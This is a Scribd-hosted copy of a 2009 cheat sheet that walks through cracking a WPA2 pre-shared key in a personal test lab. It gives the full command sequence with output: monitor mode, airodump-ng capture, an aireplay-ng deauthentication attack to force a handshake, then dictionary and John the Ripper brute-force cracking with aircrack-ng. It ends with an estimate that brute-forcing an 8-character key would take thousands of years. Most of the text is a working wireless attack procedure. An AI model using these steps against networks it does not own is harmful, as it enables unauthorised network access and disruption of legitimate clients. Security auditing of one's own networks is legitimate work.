Scribd
Upload
2K views3 pages

Cracking WPA2 PSK With Backtrack 4, Aircrack-Ng and John The Ripper

The document provides steps to crack a WPA2 PSK network using aircrack-ng, John the Ripper, and other tools: 1. Put a wireless interface into monitor mode and use airodump-ng to find target WPA2 network. 2. Use aireplay-ng to deauthenticate a connected client and capture the WPA handshake. 3. Attempt to crack the captured handshake offline using a dictionary with aircrack-ng or bruteforce all combinations with John the Ripper and aircrack-ng. 4. Bruteforcing all combinations could take over 101083382 hours (over 11500 years) for an 8 character key depending on the system used

Uploaded by

Enis Voloder
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
2K views3 pages

Cracking WPA2 PSK With Backtrack 4, Aircrack-Ng and John The Ripper

The document provides steps to crack a WPA2 PSK network using aircrack-ng, John the Ripper, and other tools: 1. Put a wireless interface into monitor mode and use airodump-ng to find target WPA2 network. 2. Use aireplay-ng to deauthenticate a connected client and capture the WPA handshake. 3. Attempt to crack the captured handshake offline using a dictionary with aircrack-ng or bruteforce all combinations with John the Ripper and aircrack-ng. 4. Bruteforcing all combinations could take over 101083382 hours (over 11500 years) for an 8 character key depending on the system used

Uploaded by

Enis Voloder
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The

Ripper
http://www.corelan.be:8800/index.php/2009/02/24/cheatsheet-cracking-wpa2-psk-wit
h-backtrack-4-aircrack-ng-and-john-the-ripper/
Basic steps :
• Put interface in monitor mode
• Find wireless network (protected with WPA2 and a Pre Shared Key)
• Capture all packets
• Wait until you see a client and deauthenticate the client, so the handshake can
be captured
• Crack the key using a dictionary file (or via John The Ripper)
I’ll use a Dlink DWL-G122 (USB) wireless network interface for this procedure. In
backtrack4, this device is recognized as wlan0.
First, put the card in monitor mode :
root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
Ok, we can now use interface mon0
Let’s find a wireless network that uses WPA2 / PSK :
root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNe


t
BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet


Stop airodump-ng and run it again, writing all packets to disk :
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
At this point, you have 2 options : either wait until a client connects and the
4-way handshake is complete, or deauthenticate an existing client and thus force
it to reassociate. Time is money, so let’s force the deauthenticate. We need the
bssid of the AP (-a) and the mac of a connected client (-c)
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F
7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ES
SID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK Te
stNet
BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230


Stop airodump-ng and make sure the files were created properly
root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
Form this point forward, you do not need to be anywhere near the wireless networ
k. All cracking will happen offline, so you can stop airodump and other processe
s and even walk away from the AP. In fact, I would suggest to walk away and find
yourself a cosy place where you can live, eat, sleep, etc…. Cracking a WPA2 PSK k
ey is based on bruteforcing, and it can take a very very long time. There are 2
ways of bruteforcing : one that is relatively fast but does not guarantee succe
ss and one that is very slow, but guarantees that you will find the key at some
point in time
The first option is by using a worklist/drstionary file. A lot of these files c
an be found on the internet (e.g. www.theargon.com or on packetstorm (see the ar
chives)), or can be generated with tools such as John The Ripper. Once the wordl
ist is created, all you need to do is run aircrack-ng with the worklist and feed
it the .cap fie that contains the WPA2 Handshake.
So if your wordlist is called word.lst (under /tmp/wordlists), you can run
aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
The success of cracking the WPA2 PSK key is directly linked to the strength of y
our password file. In other words, you may get lucky and get the key very fast,
or you may not get the key at all.
The second method (bruteforcing) will be successfull for sure, but it may take a
ges to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theo
ry you would to build every password combination with all possible character set
s and feed them into aircrack. If you want to use John The Ripper to create all
possible password combinations and feed them into aircrack-ng, this is the comma
nd to use :
root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -
b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap
(Note : the PSK in my testlab is only 8 characters, contains one uppercase chara
cter and 4 numbers). I will post the output when the key was cracked, including
the time it required to crack the key.
That’s it
Update :after 20 hours of cracking, the key still has not been found. The syste
m I’m using to crack the keys is not very fast, but let’s look at some facts :
8 characters, plain characters (lowercase and uppercase) or digits = each charac
ter in the key could has 26+26+10 (62) possible combinations. So the maximum num
ber of combinations that need to be checked in the bruteforce process is 62 * 62
* 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 At about 600 keys per
second on my “slow” system, it could take more than 101083382 hours to find the key
(11539 year). I have stopped the cracking process as my machine is way too sl
ow to crack the key while I’m still alive… So think about this when doing a WPA2 PS
K Audit.

You might also like